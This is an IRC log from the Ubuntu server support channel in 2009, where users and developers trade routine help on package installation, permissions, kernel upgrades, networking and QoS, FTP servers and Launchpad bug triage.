<Psi-Jack> And there's still never any good reason to install X on a server.
<FluxD> okay so the place where my dedicated server is hosted has several options for OS, and the latest "gui" version is 8.04 lts but server is 9.04, Like I used to do in the past apt-get install ubuntu-desktop worked fine thru nx
<FluxD> Psi-Jack, I know but I dont want to use 8.04
<Psi-Jack> So what?
<Psi-Jack> Why the fsck do you need X on a server?
<Psi-Jack> Why?
<Psi-Jack> Name one doubtfully good reason.
<FluxD> Its a remote box, and the person using it needs a gui
<guntbert> FluxD: wouldn't it be easier/safer to ask the hoster to add 9.04 desktop to the choices?
<FluxD> guntbert, they keep saying wait and wait
<FluxD> its been like 5 months now
<Psi-Jack> guntbert, There's no reason to use a desktop distribution for a server ;)
<danielgianni> I am developing a routine upgrade of the system when it recognizes a cdrom with certain files will copy these files and run them, so I have to capture the event automounting
<FluxD> Psi-Jack, still doesnt answer the question why apt-get would throw dependancies error?
<Psi-Jack> danielgianni, Sounds like ancient tech. You heard of networking?
<FluxD> never has done it in the past?
<Psi-Jack> FluxD, you have failed to provide any good reason to install X.
<FluxD> Why should it matter what I do with my dedicated server?
<Psi-Jack> You're time is up.
<Psi-Jack> Stop asking here.
<FluxD> Who are you to say that?
<Psi-Jack> Go to #ubuntu for any desktop related questions.
<FluxD> it was an apt-get question on ubuntu server
<FluxD> not a desktop question
<Psi-Jack> No, it's not.
<Psi-Jack> It's a desktop question.
<Psi-Jack> X is not supported by Server, nor Canonical.
<Psi-Jack> Shall I get an op for you?
<guntbert> Psi-Jack: I don't want to get into a "fight" over this - but if you have a remote host, that needn't be a "server", does it?
<Psi-Jack> guntbert, He's asking for support on getting Ubuntu-Server, with Desktop support.
<Psi-Jack> Thats not supported, period.
<FluxD> Yes I need an op
<Psi-Jack> !ops @ FluxD
<ubottu> Sorry, I don't know anything about ops @ FluxD
<jart> hi, i'm thinking of setting up an ubuntu 9.04 64-bit postgresql production database server.  am i crazy?  should i be using like, 32-bit 8.04 lts?
<danielgianni>  Psi-jack :D I live im Brazil, you are heard of Brazilian networks?   :D
<Psi-Jack> jart, No, that's fine.
<Psi-Jack> danielgianni, Yeah, I hear they know how to do it sometimes.
<Pici> Psi-Jack: ?
<Psi-Jack> Pici, Aha! Cool.
<guntbert> Psi-Jack: no doubt about this - indeed, you were questioning my advice to use desktop distro on the remote host :-)
<Pici> Psi-Jack: Er, Why did you cal for ops?
<Psi-Jack> guntbert, Oh. Because you can use a desktop environment locally.
<Psi-Jack> Pici, FluxD insisting to ask for desktop support for Ubuntu Server.
<jart> Psi-Jack: thanks for the reassurance :)
<guntbert> Psi-Jack: I see you point clearly :-)
<FluxD> Pici, I asked why apt-get install ubuntu-desktop would throw me dependancies error. and Psi-Jack keeps saying tis a desktop question.
<Psi-Jack> guntbert, Precisely.
<jart> i've been using 9.04 64 on my desktop and it's been working out really well for me and my software.  i just have this fear that a year down the road when upgrading everything is going to go hay-wire ._.
<Psi-Jack> Running X on a server is a memory hog, inefficient, and not meant for server use. It will more than likely crash the server, and make it useless.
<danielgianni> this solution that I'm trying To develop exactly to locations where the Internet is not available and there are technicians with necessary skills. Unfortunately this is the reality of much of Brazil
<Pici> FluxD: Well, ubuntu-desktop is not a part of the server release, hence support for it is in #ubuntu
<FluxD> Pici, someone there told me to ask it here
<FluxD> coz I am technically on ubuntu server
<jart> has anyone had problems running 64-bit 9.04 in production?
<Psi-Jack> jart, Nope. No problems.
<Pici> FluxD: You just asked if there was a channel for ubuntu server, we didn't know any of the specifics of your question when you were told about this channel.
 * Psi-Jack grins.
<FluxD> okay
<Psi-Jack> Lesson learned? Ask your specific question, not ask to ask.
<FluxD> No I didnt
<FluxD> I think you seioulsy have some issues...
<danielgianni> excuse me but I think my settings should be more related to development on Linux than any type of configuration
<danielgianni> thanks for all
<Skaag> how do I reset a serial device with stty?
<Skaag> I think I've somehow managed to put it in a weird state
<pmatulis> mattgyver: did you figure out the disconnects/
<KillMeNow> http://stsdas.stsci.edu/cgi-bin/gethelp.cgi?stty
<KillMeNow> that help skaag
<Skaag> doesn't help
<Skaag> I have the man page for stty
<Skaag> the device is /dev/ttyS0
<Skaag> I need to reset it
<Skaag> the weird thing, it works if I connect it to a windows machine
<Skaag> but under linux, I am unable to recreate the same settings that exist in the windows machine
<KillMeNow> yea, sorry man...  not much help there
<Skaag> and the funny thing is that in Windows I did not change a thing except for the terminal speed, which I set to 15200
<ruben23> hi
<ruben23> can i setup a server that well remote install on a network the OS of a  client PC.
<ruben23> eithere windows or linux
<ruben23> like the OS and install application are image on to the server.
<nick125> ruben23: Look at PXE
<ruben23> PXE....? only..
<KillMeNow> yea PXE boot to a image server
<KillMeNow> Windows calls it WDS
<KillMeNow> there are other opensource projects like FOG that have it as well
<genii> ruben23: I like to use this as a gude: https://wiki.koeln.ccc.de/index.php/Ubuntu_PXE_Install
<Psi-Jack> Sam-I-Am, Ping!
<ruben23> ok very nice..i will look into that
<Sam-I-Am> Psi-Jack: pong
<Psi-Jack> Sweet!
<Psi-Jack> Sam-I-Am, You never did email me that LDAP stuff. ;)
<Sam-I-Am> Psi-Jack: because its going to take a while to remove company-specific stuff out of it
<Sam-I-Am> i can't just send it along :/
<Psi-Jack> Ahhhh
<Psi-Jack> Okay. ;)
<Sam-I-Am> its probably 50+ pages of docs
<Psi-Jack> Well, at least you didn't forgot. hehe
<Sam-I-Am> probably more...
<Psi-Jack> Yikes! 50+ pages?
<Sam-I-Am> plus all the ldifs
<Sam-I-Am> well, its very detailed docs... what you do, what you should expect to see, how to verify it worked, etc.
<Psi-Jack> I see. Well,then, that's cool. ;)
<Psi-Jack> Ugh, I'm so hating Pages.
<Psi-Jack> Worst Document Editor ever.
<Sam-I-Am> i kinda like latex
<Psi-Jack> Kinky
 * KillMeNow puts fingers up to his ears and sings "LA LA LA LA LA LA"
<Sam-I-Am> heh
<Sam-I-Am> Psi-Jack: i'm sorta changing jobs in a week or two... hopefully get some time to de-funk the docs after that.
<Psi-Jack> Sam-I-Am, Curious. Do you have like a personal weblog or something you could publish that to as you go along? ;)
<Sam-I-Am> it'll be going somewhere
 * Psi-Jack nods.
<Sam-I-Am> i... just dunno where
<Psi-Jack> Heh, I registered psi-jack.info, a while back, and just haven't put up like an interface yet.
<ruben23> i seen on an ubuntu pro--->Clonezilla and DRBD... but the sample is linux OS on client PC only..
<Sam-I-Am> maybe i should find a place on community.ubuntu or something
<Psi-Jack> Kinda looks cool though when my email is me@psi-jack.info ;)
<ruben23> are there others....like counter part to windows of RIS/ghost
<mathiaz> bdmurray: hey - reading https://wiki.ubuntu.com/Bugs/HowToTriage/Charts
<mathiaz> bdmurray: it seems that setting the importance of the bug is late in the process
<mathiaz> bdmurray: whereas https://wiki.ubuntu.com/Bugs/Importance states "The importance of the bug should be set as soon as possible. "
<bdmurray> mathiaz: Do you have a patch? ;-)
<Sam-I-Am> mathiaz: how long should i wait for a response to bug 423252 ... seems kinda important :/
<mathiaz> bdmurray: well - I can draw something over my screen and take a picture ;)
<uvirtbot`> Launchpad bug 423252 in glibc "NSS using LDAP on Karmic (alpha 4) breaks 'su' and 'sudo'" [Undecided,New] https://launchpad.net/bugs/423252
<mathiaz> bdmurray: however it seems that setting importance is one of the first thing to do?
<mathiaz> bdmurray: is that an accurate view of the process?
<mathiaz> bdmurray: in which case the chart should be updated
<bdmurray> mathiaz: are the charts accurate?  no they are rather old and should be updated
<mathiaz> bdmurray: oh ok - so the Importance wiki page is up-to-date
<bdmurray> mathiaz: Do you have any ideas on how to fit in set importance asap in the chart?
<mathiaz> Sam-I-Am: now that alpha5 is out of the door, devs may have more time to debug the issue
<Sam-I-Am> k
<mathiaz> Sam-I-Am: keeping debugging it is of course welcome
<Sam-I-Am> well, yeah... havent had much luck though
<Sam-I-Am> strace and ld_debug havent been very useful
<mathiaz> bdmurray: it seems that the importance should be set before requesting information
<mathiaz> bdmurray: noting that the importance can be updated once more information is provided
<bdmurray> mathiaz: okay, thanks
<mathiaz> bdmurray: where are you grease monkey scripts?
<soren> mathiaz: It's the launchpad-gm-scripts project on Launchpad
<bdmurray> mathiaz: there is actually a ppa of a firefox extension now too
<soren> mathiaz: I have a branch of it that takes care of configuring them as well, if you're interested.
<soren> mathiaz: lp:~soren/launchpad-gm-scripts/launchpad-gm-scripts.easyinstall
<guest2> Hello, I have been working with ubuntu server for a week now and I have one concern. Namely, my nvidia graphics card in the server is creating a lot of noise and normally this would be remedied by installing nvidia's drivers, but they are failing. Can you help me?
<soren> guest2: What kind of noise? Physical, audible noise?
<guest2> soren: yes, from the fan.
<soren> guest2: So to get it to make /less/ noise, you have to use it /more/ (by installing X, etc.)?
 * soren shakes his head at modern graphics cards
 * ScottK would go with removed the card and use ssh.
<guest2> soren: will installing X degrade performance
<orudie> sdf
<guest2> ScottK: is there a way to disable the GPU because I might need the card later.
<ScottK> No idea.
<guest2> thanks
<soren> guest2: Well, it uses ram and a few cpu cycles here and there. The point is that it serves no useful purpose.
<qman__> I keep a bunch of legacy nvidia cards around just for my servers to avoid that problem
<qman__> fanless
<soren> guest2: It's silly to have to run an X server with the only purpose of quieting the graphics card.
<soren> I do actually have an AMD machine in my office that is really noisy. I never considered it might be the graphics card's fault.
<guest2> It is a home server
<soren> It's my first machine in a decade that has anything other than Intel graphics.
<qman__> if it's AGP, you can ebay a fanless card on the cheap
<guest2> PCI
<giovani> just as cheap for PCI
<qman__> PCI express?
<giovani> $10-15
<guest2> will the ubuntu server install break if I replace graphic cards
<qman__> nope
<giovani> not at all
<qman__> I've moved ubuntu server installs to completely different machines without issue
<qman__> as long as the hardware's supported there will be no problem
<guest2> and what command will completely undo "sudo apt-get install nvidia-glx-180"
<firecrotch> guest2: sudo apt-get purge nvidia-glx-180
<qman__> sudo apt-get remove --purge nvidia-glx-180 && sudo apt-get autoremove
<qman__> my only real recommendation is to not go older than about a riva 128, and not go newer than geforce 7 series
<qman__> anything in that range will be hassle free
<Skaag> I have a problem with my eth0 using driver 'bridge' and a device called peth0 using the real 'tg3' driver...
<qman__> oh, and avoid 7200LEs and 6200TCs, they leech system RAM
<guest2> i was using a 8600 gts that was lying around
<qman__> I even have a Vanta LT, but the framebuffers run a little slow on that one
<daxroc> Evening all
<daxroc> Any one know if libmp3lame and libx264 should be available on 8.10
<qman__> they should be, but why 8.10?
<giovani> daxroc: should be ...
<giovani> it's easy enough for you to check from the system
<daxroc> giovani: I found the packages via the web repositories but apt-get and aptitude fail to install ?
<guntbert> !info libmp3lame 8.10
<ubottu> '8.10' is not a valid distribution: dapper, dapper-backports, hardy, hardy-backports, intrepid, intrepid-backports, jaunty, jaunty-backports, karmic, karmic-backports, kubuntu-backports, kubuntu-experimental, kubuntu-updates, medibuntu, partner
<giovani> daxroc: do you have universe enabled?
<giovani> because those packages aren't in main, afaik
<guntbert> !info libmp3lame intrepid
<ubottu> Package libmp3lame does not exist in intrepid
<giovani> !info libmp3lame0 intrepid
<ubottu> libmp3lame0 (source: lame): LAME Ain't an MP3 Encoder. In component multiverse, is optional. Version 3.98-0.0 (intrepid), package size 129 kB, installed size 328 kB
<giovani> !info libx264-59 intrepid
<ubottu> libx264-59 (source: x264): x264 video coding library. In component multiverse, is optional. Version 1:0.svn20080408-0.0ubuntu1 (intrepid), package size 274 kB, installed size 648 kB
<giovani> so you need multiverse
<giovani> and there they are
<daxroc> giovani: appreciate it thanks
<ycy> /dev/sdb1              14T  143M   13T   1% /home
<guest2> How come when i update or upgrade the server, this happens: The following packages have been kept back:
<guest2>   linux-image-server linux-restricted-modules-server linux-server
<qman__> guest2, that's because a kernel update is a _Big Deal_, and should be held until you have the time to manually install them and test
<guest2> I do, so how can i update it
<qman__> to install the new kernel, just  sudo apt-get install  them
<guest2> i did but i get the same message
<qman__> if you still get the message then they didn't install for one reason or another
<ScottK> guest2: sudo apt-get dist-upgrade
<uvirtbot`> New bug: #423996 in mysql-dfsg-5.0 (main) "package mysql-server 5.1.30really5.0.75-0ubuntu10.2 failed to install/upgrade: il sottoprocesso pre-installation script ha restituito un codice di errore 1" [Undecided,New] https://launchpad.net/bugs/423996
<uvirtbot`> New bug: #424007 in mysql-dfsg-5.0 (main) "package mysql-server-5.0 5.1.30really5.0.75-0ubuntu10.2 failed to install/upgrade: subprocess pre-installation script returned error exit status 1" [Undecided,New] https://launchpad.net/bugs/424007
<gregor2005>  i have a softwareraid1 with one damaged drive
<gregor2005> i removed it from the raid and now the device switched to read-only
<gregor2005> when i switch to readwrite it switched back seconds later
#ubuntu-server 2009-09-04
<uvirtbot`> New bug: #424036 in samba (main) "Possible not a bug, but - - -" [Undecided,New] https://launchpad.net/bugs/424036
<uvirtbot`> New bug: #424053 in openssh (main) "Clarify the offending known_hosts line number when ssh key has changed" [Wishlist,New] https://launchpad.net/bugs/424053
<mathiaz> EtienneG: https://launchpad.net/~bzr/+archive/ppa
<EtienneG> mathiaz, thx
<orudie> sd
<KillMeNow> Night FOlks
<mushroomblue> http://manpages.ubuntu.com/manpages/jaunty/man1/ssu.1.html
<mushroomblue> can anyone else install this package?
<mushroomblue> apparently, it's part of sfs-common
<mushroomblue> and that package isn't found in my repository.
<mushroomblue> but there it is on ubuntu'
<mushroomblue> s manpages
<omnydevi> how would i chmod a folder in ubuntu server to allow anyone in the universe to write to it?
<omnydevi> chmod everyoneintheuniverse share :D
<mushroomblue> chmod o+rwx directory
<omnydevi> thank you mate
<mushroomblue> if you want everything in that directory to have the same privileges, then add -R at the end.
<mushroomblue> or anywhere after chmod, really. :)
<mushroomblue> rwx == "read/write/execute"
<omnydevi> makes sense :)
<mushroomblue> ugo = "user/group/others"
<mushroomblue> + adds, - divides
<mushroomblue> thus ending your chmod lesson. :)
<mushroomblue> er, - removes
<mushroomblue> thus ending my math lesson. :)
<omnydevi> great tutorial ;)
<omnydevi> this noob greatly appreciates it as well ;)
<omnydevi> heh
<mushroomblue> we were all noobs at one time.
<mushroomblue> I was a noob from 1997-2004 or so. :)
<omnydevi> amen to that mate :)
<omnydevi> heh
<omnydevi> i was deployed twice in that time frame
<omnydevi> :/
<omnydevi> before too long i will be there though, just much catching up to do
<omnydevi> cram cram cram woot!
<omnydevi> oh wow...that explains why openfiler, no it doesn't .. oh well
<omnydevi> i can write to the dir now, thanks again man, this has been kicking me arse for a while now
<mushroomblue> sure. :)
<s0|> does anyone know when postgres8.4 will replace 8.3.7 for ubuntu server?
<omnydevi> on your issue, i could have a ubuntu server setup in about 10 seconds with proxmox
<mushroomblue> probably october.
<omnydevi> want me to make a vm real fast and try to install that package?
<mushroomblue> if you want.
<mushroomblue> thing is, I'm not finding it in the repository.
<omnydevi> mine is 8.04
<omnydevi> not jaunty, bet i could download that though
<mushroomblue> don't worry about it. :)
<omnydevi> se
<omnydevi> c
<omnydevi> i gotcha man, you helped me, least i can do
<omnydevi> i am just not overly familiar with some things without a gui
<omnydevi> im one of "those" guys
<omnydevi> heh
<omnydevi> gonna download jaunty and see what i get, brb
<omnydevi> oh wow
<omnydevi> http://wiki.openvz.org/Download/template/precreated   i just found a small piece of heaven
<omnydevi> wooooooooot
<omnydevi> downloading, smoke break in the meantime
<omnydevi> nooooooooooooooo
<omnydevi> woot, brb mate, sorry its taking a while
<mushroomblue> don't worry about it. it might've been deleted.
<mushroomblue> I'm gonna troll the launchpad ppa archive to see if it's on there.
<mushroomblue> thank you for showing me OpenVZ, though. I'll put this to good use.
<mattgyver> When i ftp (or download) files from my server to my pc within the LAN, my FTP server suddenly restarts.  Does anyone have any clue what causes this behavior?
<mushroomblue> crappy connections?
<omnydevi> anytime man, love proxmox, once i get this backup share going i can help more if a little time can be spared
<mattgyver> mushroomblue, was that in response to my question?
<mushroomblue> mattgyver: yah.
<mushroomblue> I don't use FTP, tho.
<mattgyver> mushroomblue, i dont think its a connection issue, there on the same network :(  im actually using sftp
<mushroomblue> what's the FTP server's logs saying?
<mushroomblue> sftp != ftp
<mushroomblue> sftp is ssh
<mattgyver> right
<mushroomblue> check if openssh is giving errors
<mattgyver> mushroomblue, do you know which log that woudl be, i normally just look at the auth.log for ssh
<mushroomblue> well, that's really the only place it shows
<mushroomblue> are you sure it's the server puking, and not the client?
<mattgyver> mushroomblue, yeah cuz its physically restarting
<mattgyver> mushroomblue, ive been using fireftp to ftp, but im using filezilla and it seems to be working, that might just be accident though
<omnydevi> the deepest shade of mushroomblue
<omnydevi> all fuzzy...
<twb> You'reusing sftp?
<twb> mattgyver: you're using sftp, right?  NOT ftp?
<mattgyver> twb, yes sftp
<mattgyver> I dont know if fireftp perhaps its just creating an overflow of some kind..
<twb> mattgyver: use sftp or putty's psftp as a client.  Since they speak only sftp, and they are command-line tools, it should be more obvious what the problem is.
<twb> Problems should also be reported in /var/log/auth.log on the server.
<mattgyver> yeah, i didnt really notice anything out of the ordinary actually
<mattgyver> http://pastebin.com/m10fca537 , line 16 did throw me off though
<mattgyver> thats roughly the time of the crash too
<twb> mattgyver: looks like you're running NetworkManager
<mattgyver> yeah
<twb> IME all network problems are caused by it, if its there
<cef> is the server restarting, or just the download?
<mattgyver> The server is restarting, physically like you hit the reset button.
<mattgyver> I checked all the connections
<cef> ahh as in the server machine.. NOT the server process
<mattgyver> correct
<mattgyver> sorry, i should have explained that better
<cef> check load, temp and mebbe do a mem check as well
<mattgyver> did mem check, thatw as fine
<mattgyver> how do i check load?
<cef> keep an eye on the system load (use 'uptime') and the internal system temps during a download
<mattgyver> ok
<mattgyver> i will do that
<mattgyver> Whats the possibilty that fireftp could cause that running in firefox?
<mattgyver> low?
<cef> you're using the sftp protocol? there are other clients you can try if you suspect that fireftp is causing it
<mattgyver> yes, im using filezilla now
<cef> if it's windows, there's winscp, or just sftp cli clients (putty on windows, sftp/ssh on linux, etc)
<mattgyver> im on ubuntu 9.04
<ScottK> kirkland: Is there a backports bug for the kvm sitting in Hardy unaccepted?
<guest1> Hello, i want to use my server as a home network router, providing DHCP, NAT, and QoS. what is a good program that can handle this.
<giovani> guest1: well NAT/Routing/QoS are not handled by a program, they're handled by the linux kernel
<giovani> DHCP can be handled by dhcpd or dnsmasq (or others, but those are the common ones)
<mushroomblue> guest1: you seem inexperienced.
<mushroomblue> guest1: install Ubuntu 9.04
<guest1> I am with linux
<mushroomblue> if you're not comfortable with command line, use a desktop distribution.
<mushroomblue> it can act as a server.
<giovani> uh
<giovani> if you're not comfortable with the command line, use a web interface
<giovani> not a desktop os
<giovani> and then get comfortable with the command line
<guest1> I have an ubuntu server 9.04 x64, i am comfortable with a CLI, but for starters I would like a program to give me configurations
<guest1> i also use ubuntu 9.04 on another PC as a desktop
<giovani> guest1: it just isn't a simple setup the way you're envisioning
<mushroomblue> guest1: oh, dhcp3 handles dhcp
<giovani> routing/nat/qos are not terribly simple setups
<giovani> I'd recommend dnsmasq
<giovani> for a small network
<guest1> ebox messed up my config and i couldn't ssh
<giovani> you mean you messed up your config with ebox?
<guest1> yes
<mushroomblue> oh lord, run away from ebox.
<mushroomblue> I don't know why they recommend it.
<guest1> i reinstalled and i am doing this all over
<mushroomblue> download webmin.
<kirkland> ScottK: yes....
<giovani> no
<giovani> webmin is entirely unsupported
<giovani> mushroomblue: don't recommend it here
<mushroomblue> fair enough.
<kirkland> ScottK: Bug #396721
<uvirtbot`> Launchpad bug 396721 in hardy-backports "backport kvm-84 to hardy and intrepid" [Medium,Fix committed] https://launchpad.net/bugs/396721
<guest1> well, can Qos be set up independantly after DHCP and NAt masquerading are setup
<mushroomblue> why not, tho?
<mushroomblue> I mean, ebox is so very very very bad.
<giovani> guest1: DHCP is totally independent from iptables (which handles nat)
<mushroomblue> it's like when redhat used gadmin to administer a system
<kirkland> ScottK: and it very close cousin is Bug #404060
<uvirtbot`> Launchpad bug 404060 in intrepid-backports "backport libvirt to hardy and intrepid" [Wishlist,In progress] https://launchpad.net/bugs/404060
<guest1> okay, is QoS traffic control handles by iptables?
<twb> guest1: in part.
<twb> guest1: it is also handled by tc(8)
<twb> I think iptables assigns priorities to packets, and then tc chooses which order to let packets out/in based on prioritization.
<guest1> so, I can setup iptables however how can i handle QoS. i am trying to have a setup similar to this: http://www.decimation.com/markw/2007/10/03/tomato-qos-setup/
<ScottK> kirkland: Accepted.
<kirkland> ScottK: thanks for your help, scott
<kirkland> ScottK: this one has been hanging around for a long time
<ScottK> No problem.  Glad I could help.
<kirkland> ScottK: you're going to make a number of people very happy :-)
<ScottK> kirkland: Yep.  BTW, putting the bug in the changelog does help ...
<kirkland> ScottK: yeah, sorry, thought about that in retrospect, when you asked
<ScottK> No problem.
<guest1> Dos Dnsmasq come with a web interface?
<twb> guest1: it does not.
<ghostlines> I have a disk boot failure, and I can't even detect the drive with a live cd. Is it safe to say that my harddrive is dead?
<ghostlines> should I just get a replacement?
<mushroomblue> yeah.
<mushroomblue> ghostlines: unless you want to get a data forensic specialist, I'll bet the disk is dead.
<twb> Or you just bumped the cable out
<twb> Or it's on a southbridge for which you have no driver
<mushroomblue> twb: sssshhhhh!
<ScottK> Or the controller is dead
<twb> ScottK: yeah
<guest1> Hello, i want to use my ubuntu 9.04 server as a personal website host, what is the best FTP to use?
<nick125> The one that doesn't exist is the best.
<guest1> so, can anyone recommend a ftp server?
<nick125> guest1: I would use scp instead of ftp.
<guest1> my concern is that I will be sharing the web site with other people and they use FTP
<xenoterracide> what's the name of the interfaces file?
<xenoterracide> where is it?
<nick125> /etc/network/interfaces
<nick125> guest1: If you must use FTP, I'd probably go with vsftpd.
<xenoterracide> nick125: ty. I can't remember it from distro to distro
<guest1> is it easy to configure?
<nick125> guest1: shouldn't be too hard
<guest1> nick125: thx, "sudo apt-get install vsftpd"?
<nick125> guest1: That should get you started...I think vsftpd is covered in the server guide
<guest1> thank you
<twb> vsftpd or ssh (sftp) are the only implementations you should even consider for a world-visible server.
<twb> Preferably you'd use HTTP, because FTP has problems with NATs
<xenoterracide> anyone know the command to list QoS rules?
<mushroomb1ue> anyone know a way to check what process is using all my swap?
<qman__> my guess is that said process would be using all your RAM, so top or any of the other equivalent tools should show you
<twb> Don't you just compare RSZ to VSZ?
<qman__> after a quick scroll through the manual
<qman__> in top, the "SWAP" column shows how much swap each process is uing
<qman__> using*
<qman__> it doesn't show by default, just press f, then p, then enter to bring it up
<qman__> my mysqld is sure using a lot of memory
<qman__> hmm, that's odd
<qman__> console-kit-daemon is using 757MB
<qman__> It's obviously eating RAM like it's cool, but I have no idea why
<mushroomb1ue> dunno. mine does the same thing.
<qman__> I'm going to try logging out of all sessions, see if that fixes it
<qman__> nope
<qman__> you said you're having the same issue, what's the uptime on your machine?
<qman__> mine's 86 days
<mushroomb1ue> 2 days
<mushroomb1ue> :)
<qman__> and it's using hundreds of megs? I was thinking it might be a slow leak
<twb> I'm glad my box doesn't have that newfangled shite on it
<uvirtbot`> New bug: #423854 in samba (main) "Karmic: Multiple crashes in "net usershare list"" [Undecided,Confirmed] https://launchpad.net/bugs/423854
<twb> Dunno why people run non-LTS on their servers...
<qman__> it's the only one I have that's not running hardy
<twb> Oh, and my servers have low uptimes because of all the security updates to the kernel :-(
<qman__> yeah, I wanted to try out ksplice, but the way things are now, it depends on X thanks to kernel-oops
<twb> Ha
<KurtKraut> I'd like to make an 'traffic accounting'. Log every IP address my server stabilished a TCP or UDP connection and how much traffic were sent/received by each IP. What package should I use for this job?
<jmarsden> KurtKraut: argus and ra will log every connection, but not the amount of traffic they use... ntop will show you traffic statistics but is interactive (web based UI)... bandwidthd maybe?
<KurtKraut> jmarsden, I need to save it to a log. I want to later query each IP address to know its ASN and make statics about to what ASN most of my traffic is going to.
<jmarsden> Sounds like a very specific need... those are the tools in this general area I know of... a quick apt-cache search suggest that maybe iptotal or pmacct would be worth your while looking at too.
<KurtKraut> jmarsden, I found the package net-acct that does exactly what I want but the man page alerts it is not maintained and no bug should be filed agains this package since there is currently no developer working on it.
<jmarsden> Well, if it works for you and using an unsupported package is OK with you, go for it :)
<KurtKraut> jmarsden, I'll try that out. Until know what I want to do is an un-scientific traffic analysis. Later, I'll need something more reliable. Thanks for your attention.
<jmarsden> No problem.  Lokks like bandwidthd can be configured to output logs in CDF format, so that is worth trying.
<qman__> I use vnstat for my bandwidth logging, but I don't know if it can get that specific
<qman__> my setup is just per interface
<jmarsden> I'm pretty sure that's as detailed as vnstat goes -- per interface, not per-IP or per-connection.
<error404notfound> i have 2 1Mbps lines at my home, both are dialup DSL's which i dial via MPD or PPP, is there a way i can combine both of those connections and present as one to the network behind server to do loadbalancing and make a cost effective my own 2Mbps package?
<qman__> there are ways to load balance, but you can't achieve 2mbps for a single connection
<error404notfound> qman__, i mean somehow combine both, so that it might appear as a single line to the users behind server.
<qman__> it would still be two 1mbps lines, with the capability to have two or more simultaneous connections divided on either line
<error404notfound> hmmm, so if one line is congested, rest of traffic will be moved to the other line, right?
<qman__> yes, dynamically handled by the kernel
<qman__> it's only really effective with medium to heavy traffic
<simplexio> error404notfound: im aware only iptables solution which routes data per incoming ip address or by protocol
<error404notfound> well we are heavily using 1Mbps line, and most of the time people complait of slow speed.
<simplexio> implement Qos + port 80 to only to one link, all other to other
<simplexio> + fall back to handle all traffic throu just one link
<qman__> I found a good document on it a week or so ago, can't remember it though
<simplexio> i think those are pretty simple to configure
<error404notfound> hmmm, but youtube, metacafe also uses port 80 e.g. users browse to them using web browser.
<qman__> maybe you could filter those based on outgoing IP?
<simplexio> eah.. that is problem, that why QoS
<simplexio> fast search. ubuntu 2 isp 1 connection find some kind howto get started .D
<simplexio> http://tetro.net/misc/multilink.html thats seems to do what you want
<error404notfound> simplexio, lemme check...
<error404notfound> thanks :D
<simplexio> started to that maybe simple bridge may do what you want..
<simplexio> and maybe not, route probably goes wrong without firewall solution
<daxroc> qman__: some dsl providers offer dsl bonding ( pairing of 2 or more lines )
<daxroc> pfsense decent fw os that can handle multi-wan with load ballancing and fail over capabilities ( round robin etc...)
<etbl> does anyone have a stock hardy /etc/ejabberd/ejabberd.cfg that they can upload for me?
<pmatulis> etbl: what package is this file found in?
<etbl> pmatulis: ejabberd
<pmatulis> etbl: can't you download the source package?
<garymc> ont suppose anyone knows why I cant change my ntp.conf file now. It says I ont have permission?
<garymc> *Don't
<garymc> Im logged in as a Thin Client
<pmatulis> garymc: check permissions obviously
<garymc> yes i have but it wont let me change it?
<garymc> well how o i edit that file?
<pmatulis> garymc: you're logged in to the server with a thin client?
<garymc> yes
<garymc> i coul o it the other day, but needed to o a reinstall and now i cant do it
<aubre> put your user in the group that has group ownership in /etc/group
<macstar> hi, i accidently deleted my auth.log, so i created a new one, but the server doesnt seem to be logging to it, how can i get it to work again ?
<Boohbah> macstar: mine looks like this. you probably need to set proper ownership/permissions.
<pmatulis> macstar: check the permissions and ownership
<Boohbah> -rw-r----- 1 syslog adm 291249 2009-09-04 06:39 /var/log/auth.log
<Boohbah> macstar: note the 'adm' group
<Boohbah> chmod 640 /var/log/auth.log && chown syslog:adm /var/log/auth.log
<macstar> cool thanks
<macstar> though it would be permissions
<macstar> still not getting any entries ??
<Boohbah> /etc/init.d/sysklogd restart
<Boohbah> macstar: then you have to do something that will touch the auth.log, like 'su -'
<Boohbah> or sudo something
<macstar> that would be the one
<macstar> yeah i had already done touch
<macstar> restarting the demon sorted it out
<Boohbah> excellent
<macstar> thanks guys :D
<etbl> could someone running hardy please aptitude install ejabberd and then paste me their /etc/ejabberd/ejabberd.cfg?
<pmatulis> etbl: can't you download the source package?
<etbl> pmatulis: no, its a little different
<pmatulis> etbl: apt-get source ejabberd
<etbl> pmatulis: what will that do?
<pmatulis> etbl: download the source package
<etbl> and install it?
<pmatulis> etbl: then find your file
<pmatulis> etbl: no, just download the source package
<etbl> where do i find my file?
<pmatulis> etbl: in the source package you just downloaded
<etbl> but where will that be located?
<pmatulis> etbl: in cwd
<etbl> pmatulis: the thing is, i don't think that will even work/help me
<etbl> cwd?
<pmatulis> current working directory
<etbl> http://packages.ubuntu.com/hardy/i386/ejabberd/filelist doesn't mention anything about /etc/ejabberd/ejabberd.cfg
<etbl> oh, right ;)
<etbl> so i'm not sure how it gets there when it gets installed
<etbl> i already tried unpacking my deb cache file
<nijaba> Daviey: Hello, if you have time, can you give us your pov on bug #414617 ?
<uvirtbot`> Launchpad bug 414617 in ubuntu-server-tips "Ubuntu Server Tips: ifup and ifdown" [Undecided,Incomplete] https://launchpad.net/bugs/414617
<Daviey> nijaba: i see both sides TBH
<etbl> pmatulis: can you please help me out?
<Daviey> nijaba: it's not inappropriate, but inversely it's not unhelpful.
<pmatulis> etbl: i can't do any more than what i've given you
<etbl> pmatulis: but the file isn't there in the packages.ubuntu.com filelist
<pmatulis> etbl: not sure why you're talking about a web site, just d/l the source and take your file
<nijaba> Daviey: well, I think we should try to avoid to obvious ones, or else we might loose the occasional reader's attention....  but it is a fine line :P
<pmatulis> etbl: i've just done it but for jaunty
<Daviey> nijaba: i say, don't include it yet.
<Daviey> nijaba: I really appreciate help with looking at them!
<etbl> pmatulis: because the website indicates that the file won't be there
<nijaba> Daviey: ok, cool.  Hey, I did say I would, didn't I?
<pmatulis> etbl: i just told you that i did it for jaunty
<nijaba> Daviey: reagarding lool's remark about po file building, do you know how to fix this?
<Daviey> nijaba: yeah
<macstar> anyone know anything about jailkit?
<Daviey> nijaba: yeah.. that isn't an issue
<Daviey> i think i have a fix ready to commit
<nijaba> Daviey: great then :)
<etbl> pmatulis: oh, i see, i misunderstood you
<Daviey> nijaba: i assume a MIR bug marked as "Fix Committed" means it's been uploaded regardless.. but it still seems to be in universe?
<aubre> hi nijaba, Daviey I see you've been looking at my bugs
<nijaba> davi
<nijaba> Daviey: no, it now need to ne seeded by a core-dev
<macstar> what is the easist way to look a user into a folder, i want to create a drop folder only for a user over sftp
<macstar> ?
<nijaba> Daviey: and since an another opp will be needed when our FFe is granted, I was wainting to have both before asking some coredev to do it
